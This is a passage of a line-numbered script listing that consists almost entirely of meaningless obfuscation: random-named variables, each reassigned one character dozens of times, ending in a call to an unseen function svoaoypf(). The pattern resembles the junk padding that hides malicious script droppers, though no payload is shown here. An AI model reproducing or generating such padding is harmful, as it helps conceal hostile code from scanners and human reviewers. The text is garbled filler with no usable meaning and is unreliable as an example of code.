839 | ninqykskn = "F"; | |
840 | ninqykskn = "v"; | |
841 | ninqykskn = "X"; | |
842 | ninqykskn = "q"; | |
843 | ninqykskn = "W"; | |
844 | ninqykskn = "p"; | |
845 | ninqykskn = "A"; | |
846 | ninqykskn = "A"; | |
847 | ninqykskn = "r"; | |
848 | ninqykskn = "Q"; | |
849 | ninqykskn = "m"; | |
850 | ninqykskn = "x"; | |
851 | ninqykskn = "Q"; | |
852 | ninqykskn = "k"; | |
853 | ninqykskn = "H"; | |
854 | ninqykskn = "d"; | |
855 | tmxyzlmh = "F"; | |
856 | tmxyzlmh = "A"; | |
857 | tmxyzlmh = "F"; | |
858 | tmxyzlmh = "j"; | |
859 | tmxyzlmh = "Z"; | |
860 | tmxyzlmh = "n"; | |
861 | tmxyzlmh = "A"; | |
862 | tmxyzlmh = "Z"; | |
863 | tmxyzlmh = "g"; | |
864 | tmxyzlmh = "i"; | |
865 | tmxyzlmh = "Z"; | |
866 | tmxyzlmh = "Z"; | |
867 | tmxyzlmh = "u"; | |
868 | tmxyzlmh = "3"; | |
869 | wuubs = "X"; | |
870 | wuubs = "t"; | |
871 | wuubs = "g"; | |
872 | wuubs = "X"; | |
873 | wuubs = "K"; | |
874 | wuubs = "n"; | |
875 | wuubs = "F"; | |
876 | wuubs = "h"; | |
877 | wuubs = "Q"; | |
878 | wuubs = "n"; | |
879 | wuubs = "j"; | |
880 | wuubs = "M"; | |
881 | wuubs = "P"; | |
882 | wuubs = "B"; | |
883 | wuubs = "K"; | |
884 | wuubs = "I"; | |
885 | wuubs = "D"; | |
886 | wuubs = "l"; | |
887 | wuubs = "F"; | |
888 | wuubs = "w"; | |
889 | wuubs = "p"; | |
890 | wuubs = "I"; | |
891 | wuubs = "N"; | |
892 | wuubs = "H"; | |
893 | wuubs = "O"; | |
894 | wuubs = "f"; | |
895 | wuubs = "G"; | |
896 | wuubs = "l"; | |
897 | wuubs = "e"; | |
898 | tfyiiewq = "B"; | |
899 | tfyiiewq = "L"; | |
900 | tfyiiewq = "M"; | |
901 | tfyiiewq = "V"; | |
902 | tfyiiewq = "h"; | |
903 | tfyiiewq = "H"; | |
904 | tfyiiewq = "Q"; | |
905 | tfyiiewq = "i"; | |
906 | tfyiiewq = "D"; | |
907 | tfyiiewq = "A"; | |
908 | tfyiiewq = "P"; | |
909 | tfyiiewq = "a"; | |
910 | tfyiiewq = "W"; | |
911 | tfyiiewq = "g"; | |
912 | tfyiiewq = "g"; | |
913 | tfyiiewq = "n"; | |
914 | tfyiiewq = "j"; | |
915 | tfyiiewq = "C"; | |
916 | tfyiiewq = "M"; | |
917 | tfyiiewq = "u"; | |
918 | tfyiiewq = "o"; | |
919 | tfyiiewq = "F"; | |
920 | tfyiiewq = "A"; | |
921 | tfyiiewq = "p"; | |
922 | tfyiiewq = "A"; | |
923 | tfyiiewq = "F"; | |
924 | tfyiiewq = "U"; | |
925 | tfyiiewq = "H"; | |
926 | tfyiiewq = "H"; | |
927 | tfyiiewq = "M"; | |
928 | tfyiiewq = "M"; | |
929 | tfyiiewq = "M"; | |
930 | tfyiiewq = "w"; | |
931 | tfyiiewq = "J"; | |
932 | tfyiiewq = "f"; | |
933 | tfyiiewq = "g"; | |
934 | kdqyaioun = "N"; | |
935 | kdqyaioun = "G"; | |
936 | kdqyaioun = "A"; | |
937 | kdqyaioun = "v"; | |
938 | kdqyaioun = "E"; | |
939 | kdqyaioun = "A"; | |
940 | kdqyaioun = "h"; | |
941 | kdqyaioun = "T"; | |
942 | kdqyaioun = "P"; | |
943 | kdqyaioun = "t"; | |
944 | kdqyaioun = "g"; | |
945 | kdqyaioun = "i"; | |
946 | kdqyaioun = "u"; | |
947 | kdqyaioun = "q"; | |
948 | kdqyaioun = "H"; | |
949 | kdqyaioun = "p"; | |
950 | kdqyaioun = "y"; | |
951 | kdqyaioun = "Y"; | |
952 | kdqyaioun = "k"; | |
953 | kdqyaioun = "w"; | |
954 | kdqyaioun = "x"; | |
955 | kdqyaioun = "w"; | |
956 | kdqyaioun = "X"; | |
957 | kdqyaioun = "p"; | |
958 | kdqyaioun = "x"; | |
959 | kdqyaioun = "R"; | |
960 | kdqyaioun = "L"; | |
961 | kdqyaioun = "E"; | |
962 | kdqyaioun = "v"; | |
963 | kdqyaioun = "x"; | |
964 | kdqyaioun = "f"; | |
965 | kdqyaioun = "W"; | |
966 | kdqyaioun = "n"; | |
967 | kdqyaioun = "x"; | |
968 | kdqyaioun = "O"; | |
969 | grwaxwtk = "C"; | |
970 | grwaxwtk = "E"; | |
971 | grwaxwtk = "i"; | |
972 | grwaxwtk = "l"; | |
973 | grwaxwtk = "v"; | |
974 | grwaxwtk = "e"; | |
975 | grwaxwtk = "d"; | |
976 | grwaxwtk = "o"; | |
977 | grwaxwtk = "U"; | |
978 | grwaxwtk = "H"; | |
979 | grwaxwtk = "K"; | |
980 | grwaxwtk = "S"; | |
981 | grwaxwtk = "b"; | |
982 | grwaxwtk = "a"; | |
983 | grwaxwtk = "Z"; | |
984 | grwaxwtk = "A"; | |
985 | grwaxwtk = "x"; | |
986 | grwaxwtk = "z"; | |
987 | grwaxwtk = "f"; | |
988 | grwaxwtk = "h"; | |
989 | grwaxwtk = "K"; | |
990 | grwaxwtk = "V"; | |
991 | grwaxwtk = "p"; | |
992 | grwaxwtk = "g"; | |
993 | grwaxwtk = "T"; | |
994 | grwaxwtk = "a"; | |
995 | grwaxwtk = "x"; | |
996 | grwaxwtk = "A"; | |
997 | grwaxwtk = "h"; | |
998 | grwaxwtk = "Q"; | |
999 | grwaxwtk = "u"; | |
1000 | grwaxwtk = "F"; | |
1001 | grwaxwtk = "I"; | |
1002 | grwaxwtk = "U"; | |
1003 | grwaxwtk = "I"; | |
1004 | grwaxwtk = "f"; | |
1005 | grwaxwtk = "L"; | |
1006 | grwaxwtk = "F"; | |
1007 | grwaxwtk = "r"; | |
1008 | grwaxwtk = "F"; | |
1009 | grwaxwtk = "s"; | |
1010 | grwaxwtk = "y"; | |
1011 | grwaxwtk = "g"; | |
1012 | grwaxwtk = "x"; | |
1013 | grwaxwtk = "%"; | |
1014 | oyznegmj = "S"; | |
1015 | oyznegmj = "C"; | |
1016 | oyznegmj = "Z"; | |
1017 | oyznegmj = "B"; | |
1018 | oyznegmj = "V"; | |
1019 | oyznegmj = "R"; | |
1020 | oyznegmj = "f"; | |
1021 | oyznegmj = "S"; | |
1022 | oyznegmj = "d"; | |
1023 | oyznegmj = "C"; | |
1024 | oyznegmj = "j"; | |
1025 | oyznegmj = "p"; | |
1026 | oyznegmj = "j"; | |
1027 | oyznegmj = "e"; | |
1028 | oyznegmj = "N"; | |
1029 | oyznegmj = "V"; | |
1030 | oyznegmj = "E"; | |
1031 | oyznegmj = "X"; | |
1032 | oyznegmj = "Z"; | |
1033 | oyznegmj = "G"; | |
1034 | oyznegmj = "w"; | |
1035 | oyznegmj = "Y"; | |
1036 | oyznegmj = "Q"; | |
1037 | oyznegmj = "n"; | |
1038 | oyznegmj = "d"; | |
1039 | oyznegmj = "W"; | |
1040 | oyznegmj = "K"; | |
1041 | oyznegmj = "m"; | |
1042 | oyznegmj = "o"; | |
1043 | oyznegmj = "U"; | |
1044 | oyznegmj = "y"; | |
1045 | oyznegmj = "k"; | |
1046 | nezrzb = "j"; | |
1047 | nezrzb = "N"; | |
1048 | eeujcw = "t"; | |
1049 | eeujcw = "B"; | |
1050 | eeujcw = "t"; | |
1051 | eeujcw = "p"; | |
1052 | eeujcw = "g"; | |
1053 | eeujcw = "D"; | |
1054 | eeujcw = "A"; | |
1055 | eeujcw = "v"; | |
1056 | eeujcw = "T"; | |
1057 | eeujcw = "M"; | |
1058 | eeujcw = "p"; | |
1059 | eeujcw = "u"; | |
1060 | emtjxgpf = "h"; | |
1061 | emtjxgpf = "T"; | |
1062 | emtjxgpf = "r"; | |
1063 | emtjxgpf = "n"; | |
1064 | emtjxgpf = "N"; | |
1065 | emtjxgpf = "d"; | |
1066 | emtjxgpf = "u"; | |
1067 | emtjxgpf = "E"; | |
1068 | emtjxgpf = "h"; | |
1069 | emtjxgpf = "Q"; | |
1070 | emtjxgpf = "r"; | |
1071 | emtjxgpf = "V"; | |
1072 | emtjxgpf = "Z"; | |
1073 | emtjxgpf = "S"; | |
1074 | emtjxgpf = "B"; | |
1075 | emtjxgpf = "K"; | |
1076 | emtjxgpf = "m"; | |
1077 | emtjxgpf = "z"; | |
1078 | emtjxgpf = "l"; | |
1079 | emtjxgpf = "g"; | |
1080 | emtjxgpf = "m"; | |
1081 | emtjxgpf = "e"; | |
1082 | emtjxgpf = "c"; | |
1083 | emtjxgpf = "k"; | |
1084 | emtjxgpf = "p"; | |
1085 | emtjxgpf = "Z"; | |
1086 | emtjxgpf = "R"; | |
1087 | emtjxgpf = "C"; | |
1088 | emtjxgpf = "o"; | |
1089 | emtjxgpf = "_"; | |
1090 | awgwrtl = "l"; | |
1091 | awgwrtl = "c"; | |
1092 | awgwrtl = "w"; | |
1093 | awgwrtl = "g"; | |
1094 | awgwrtl = "h"; | |
1095 | awgwrtl = "j"; | |
1096 | awgwrtl = "w"; | |
1097 | awgwrtl = "m"; | |
1098 | awgwrtl = "R"; | |
1099 | awgwrtl = "p"; | |
1100 | awgwrtl = "a"; | |
1101 | awgwrtl = "l"; | |
1102 | awgwrtl = "F"; | |
1103 | awgwrtl = "t"; | |
1104 | awgwrtl = "o"; | |
1105 | awgwrtl = "S"; | |
1106 | awgwrtl = "b"; | |
1107 | awgwrtl = "I"; | |
1108 | awgwrtl = "x"; | |
1109 | awgwrtl = "d"; | |
1110 | awgwrtl = "F"; | |
1111 | awgwrtl = "a"; | |
1112 | awgwrtl = "B"; | |
1113 | awgwrtl = "V"; | |
1114 | awgwrtl = "b"; | |
1115 | awgwrtl = "t"; | |
1116 | awgwrtl = "P"; | |
1117 | awgwrtl = "e"; | |
1118 | awgwrtl = "b"; | |
1119 | awgwrtl = "O"; | |
1120 | awgwrtl = "L"; | |
1121 | awgwrtl = "Z"; | |
1122 | awgwrtl = "F"; | |
1123 | awgwrtl = "o"; | |
1124 | awgwrtl = "k"; | |
1125 | awgwrtl = "F"; | |
1126 | awgwrtl = "R"; | |
1127 | awgwrtl = "w"; | |
1128 | awgwrtl = "d"; | |
1129 | awgwrtl = "c"; | |
1130 | awgwrtl = "@"; | |
1131 | csikz = "m"; | |
1132 | csikz = "G"; | |
1133 | csikz = "E"; | |
1134 | csikz = "D"; | |
1135 | csikz = "g"; | |
1136 | csikz = "S"; | |
1137 | rtzvgpfu = "c"; | |
1138 | rtzvgpfu = "b"; | |
1139 | rtzvgpfu = "J"; | |
1140 | rtzvgpfu = "l"; | |
1141 | rtzvgpfu = "p"; | |
1142 | rtzvgpfu = "t"; | |
1143 | rtzvgpfu = "L"; | |
1144 | rtzvgpfu = "p"; | |
1145 | rtzvgpfu = "K"; | |
1146 | rtzvgpfu = "W"; | |
1147 | rtzvgpfu = "S"; | |
1148 | rtzvgpfu = "T"; | |
1149 | rtzvgpfu = "P"; | |
1150 | rtzvgpfu = "v"; | |
1151 | rtzvgpfu = "O"; | |
1152 | rtzvgpfu = "i"; | |
1153 | rtzvgpfu = "R"; | |
1154 | rtzvgpfu = "S"; | |
1155 | rtzvgpfu = "E"; | |
1156 | rtzvgpfu = "l"; | |
1157 | zczifpn = "G"; | |
1158 | zczifpn = "Z"; | |
1159 | zczifpn = "e"; | |
1160 | zczifpn = "H"; | |
1161 | zczifpn = "z"; | |
1162 | zczifpn = "G"; | |
1163 | zczifpn = "x"; | |
1164 | zczifpn = "N"; | |
1165 | zczifpn = "e"; | |
1166 | zczifpn = "O"; | |
1167 | zczifpn = "W"; | |
1168 | zczifpn = "k"; | |
1169 | zczifpn = "l"; | |
1170 | zczifpn = "y"; | |
1171 | zczifpn = "j"; | |
1172 | zczifpn = "E"; | |
1173 | zczifpn = "k"; | |
1174 | zczifpn = "p"; | |
1175 | zczifpn = "C"; | |
1176 | zczifpn = "f"; | |
1177 | zczifpn = "U"; | |
1178 | zczifpn = "J"; | |
1179 | zczifpn = "K"; | |
1180 | zczifpn = "O"; | |
1181 | zczifpn = "g"; | |
1182 | zczifpn = "H"; | |
1183 | zczifpn = "D"; | |
1184 | zczifpn = "k"; | |
1185 | zczifpn = "X"; | |
1186 | zczifpn = "f"; | |
1187 | zczifpn = "B"; | |
1188 | zczifpn = "e"; | |
1189 | zczifpn = "S"; | |
1190 | zczifpn = "J"; | |
1191 | zczifpn = "P"; | |
1192 | zczifpn = "X"; | |
1193 | zczifpn = "t"; | |
1194 | zczifpn = "q"; | |
1195 | zczifpn = "l"; | |
1196 | zczifpn = "k"; | |
1197 | zczifpn = "L"; | |
1198 | zczifpn = "Q"; | |
1199 | zczifpn = "\""; | |
1200 | fkadiapgw = "X"; | |
1201 | fkadiapgw = "V"; | |
1202 | fkadiapgw = "h"; | |
1203 | fkadiapgw = "d"; | |
1204 | fkadiapgw = "C"; | |
1205 | fkadiapgw = "Y"; | |
1206 | fkadiapgw = "B"; | |
1207 | fkadiapgw = "o"; | |
1208 | fkadiapgw = "T"; | |
1209 | fkadiapgw = "t"; | |
1210 | fkadiapgw = "Q"; | |
1211 | fkadiapgw = "J"; | |
1212 | fkadiapgw = "E"; | |
1213 | fkadiapgw = "H"; | |
1214 | fkadiapgw = "T"; | |
1215 | fkadiapgw = "a"; | |
1216 | fkadiapgw = "S"; | |
1217 | fkadiapgw = "s"; | |
1218 | fkadiapgw = "E"; | |
1219 | xiisi = "b"; | |
1220 | xiisi = "f"; | |
1221 | xiisi = "d"; | |
1222 | xiisi = "S"; | |
1223 | xiisi = "B"; | |
1224 | xiisi = "w"; | |
1225 | xiisi = "i"; | |
1226 | xiisi = "W"; | |
1227 | xiisi = "o"; | |
1228 | xiisi = "P"; | |
1229 | xiisi = "B"; | |
1230 | xiisi = "d"; | |
1231 | xiisi = "x"; | |
1232 | xiisi = "U"; | |
1233 | xiisi = "H"; | |
1234 | mmxwdwiqw = "a"; | |
1235 | mmxwdwiqw = "z"; | |
1236 | mmxwdwiqw = "Y"; | |
1237 | mmxwdwiqw = "b"; | |
1238 | mmxwdwiqw = "u"; | |
1239 | mmxwdwiqw = "h"; | |
1240 | mmxwdwiqw = "V"; | |
1241 | mmxwdwiqw = "X"; | |
1242 | mmxwdwiqw = "q"; | |
1243 | mmxwdwiqw = "Z"; | |
1244 | mmxwdwiqw = "z"; | |
1245 | mmxwdwiqw = "p"; | |
1246 | mmxwdwiqw = "p"; | |
1247 | mmxwdwiqw = "i"; | |
1248 | mmxwdwiqw = "d"; | |
1249 | mmxwdwiqw = "g"; | |
1250 | mmxwdwiqw = "R"; | |
1251 | mmxwdwiqw = "r"; | |
1252 | mmxwdwiqw = "L"; | |
1253 | mmxwdwiqw = "m"; | |
1254 | mmxwdwiqw = "m"; | |
1255 | mmxwdwiqw = "H"; | |
1256 | mmxwdwiqw = "v"; | |
1257 | mmxwdwiqw = "P"; | |
1258 | mmxwdwiqw = "T"; | |
1259 | hkitgzt = "H"; | |
1260 | hkitgzt = "T"; | |
1261 | hkitgzt = "H"; | |
1262 | hkitgzt = "C"; | |
1263 | hkitgzt = "A"; | |
1264 | hkitgzt = "M"; | |
1265 | hkitgzt = "S"; | |
1266 | hkitgzt = "A"; | |
1267 | hkitgzt = "B"; | |
1268 | hkitgzt = "A"; | |
1269 | hkitgzt = "c"; | |
1270 | hkitgzt = "I"; | |
1271 | hkitgzt = "D"; | |
1272 | hkitgzt = "L"; | |
1273 | hkitgzt = "v"; | |
1274 | hkitgzt = "s"; | |
1275 | hkitgzt = "U"; | |
1276 | hkitgzt = "P"; | |
1277 | hkitgzt = "P"; | |
1278 | hkitgzt = "A"; | |
1279 | hkitgzt = "L"; | |
1280 | hkitgzt = "I"; | |
1281 | hkitgzt = "f"; | |
1282 | hkitgzt = "K"; | |
1283 | hkitgzt = "Q"; | |
1284 | hfvnpps = "J"; | |
1285 | hfvnpps = "h"; | |
1286 | hfvnpps = "-"; | |
1287 | zsnzcqoo = "H"; | |
1288 | zsnzcqoo = "J"; | |
1289 | zsnzcqoo = "W"; | |
1290 | zsnzcqoo = "Y"; | |
1291 | zsnzcqoo = "E"; | |
1292 | zsnzcqoo = "q"; | |
1293 | zsnzcqoo = "x"; | |
1294 | zsnzcqoo = "o"; | |
1295 | zsnzcqoo = "B"; | |
1296 | zsnzcqoo = "C"; | |
1297 | zsnzcqoo = "K"; | |
1298 | zsnzcqoo = "t"; | |
1299 | zsnzcqoo = "Z"; | |
1300 | zsnzcqoo = "n"; | |
1301 | zsnzcqoo = "I"; | |
1302 | zsnzcqoo = "D"; | |
1303 | zsnzcqoo = "c"; | |
1304 | zsnzcqoo = "H"; | |
1305 | zsnzcqoo = "F"; | |
1306 | zsnzcqoo = "L"; | |
1307 | zsnzcqoo = "V"; | |
1308 | zsnzcqoo = "x"; | |
1309 | twvnldmpt = "v"; | |
1310 | twvnldmpt = "U"; | |
1311 | twvnldmpt = "g"; | |
1312 | twvnldmpt = "w"; | |
1313 | twvnldmpt = "g"; | |
1314 | twvnldmpt = "K"; | |
1315 | twvnldmpt = "k"; | |
1316 | twvnldmpt = "F"; | |
1317 | twvnldmpt = "V"; | |
1318 | twvnldmpt = "g"; | |
1319 | twvnldmpt = "i"; | |
1320 | twvnldmpt = "t"; | |
1321 | yzamvqfv = "T"; | |
1322 | yzamvqfv = "G"; | |
1323 | yzamvqfv = "S"; | |
1324 | yzamvqfv = "z"; | |
1325 | yzamvqfv = "I"; | |
1326 | yzamvqfv = "B"; | |
1327 | yzamvqfv = "R"; | |
1328 | yzamvqfv = "O"; | |
1329 | yzamvqfv = "U"; | |
1330 | yzamvqfv = "B"; | |
1331 | yzamvqfv = "H"; | |
1332 | yzamvqfv = "B"; | |
1333 | yzamvqfv = "C"; | |
1334 | yzamvqfv = "E"; | |
1335 | yzamvqfv = "I"; | |
1336 | yzamvqfv = "g"; | |
1337 | yzamvqfv = "w"; | |
1338 | yzamvqfv = "c"; | |
1339 | yzamvqfv = "F"; | |
1340 | yzamvqfv = "P"; | |
1341 | yzamvqfv = "D"; | |
1342 | yzamvqfv = "t"; | |
1343 | yzamvqfv = "A"; | |
1344 | yzamvqfv = "x"; | |
1345 | yzamvqfv = "i"; | |
1346 | yzamvqfv = "x"; | |
1347 | yzamvqfv = "c"; | |
1348 | yzamvqfv = "h"; | |
1349 | yzamvqfv = "q"; | |
1350 | yzamvqfv = "T"; | |
1351 | yzamvqfv = "s"; | |
1352 | yzamvqfv = "p"; | |
1353 | yzamvqfv = "U"; | |
1354 | yzamvqfv = "O"; | |
1355 | yzamvqfv = "e"; | |
1356 | yzamvqfv = "c"; | |
1357 | vgsxrzgh = "t"; | |
1358 | vgsxrzgh = "M"; | |
1359 | vgsxrzgh = "m"; | |
1360 | vgsxrzgh = "X"; | |
1361 | vgsxrzgh = "M"; | |
1362 | vgsxrzgh = "L"; | |
1363 | vgsxrzgh = "t"; | |
1364 | vgsxrzgh = "K"; | |
1365 | vgsxrzgh = "A"; | |
1366 | vgsxrzgh = "M"; | |
1367 | vgsxrzgh = "H"; | |
1368 | vgsxrzgh = "O"; | |
1369 | vgsxrzgh = "c"; | |
1370 | vgsxrzgh = "n"; | |
1371 | vgsxrzgh = "J"; | |
1372 | vgsxrzgh = "d"; | |
1373 | vgsxrzgh = "U"; | |
1374 | vgsxrzgh = "p"; | |
1375 | vgsxrzgh = "r"; | |
1376 | vgsxrzgh = "E"; | |
1377 | vgsxrzgh = "O"; | |
1378 | vgsxrzgh = "p"; | |
1379 | vgsxrzgh = "r"; | |
1380 | vgsxrzgh = "Y"; | |
1381 | vgsxrzgh = "z"; | |
1382 | vgsxrzgh = "R"; | |
1383 | vgsxrzgh = "K"; | |
1384 | vgsxrzgh = "j"; | |
1385 | vgsxrzgh = "q"; | |
1386 | vgsxrzgh = "M"; | |
1387 | vgsxrzgh = "W"; | |
1388 | vgsxrzgh = "N"; | |
1389 | vgsxrzgh = "Y"; | |
1390 | vgsxrzgh = "K"; | |
1391 | vgsxrzgh = "s"; | |
1392 | vgsxrzgh = "8"; | |
1393 | svoaoypf ( ); |
|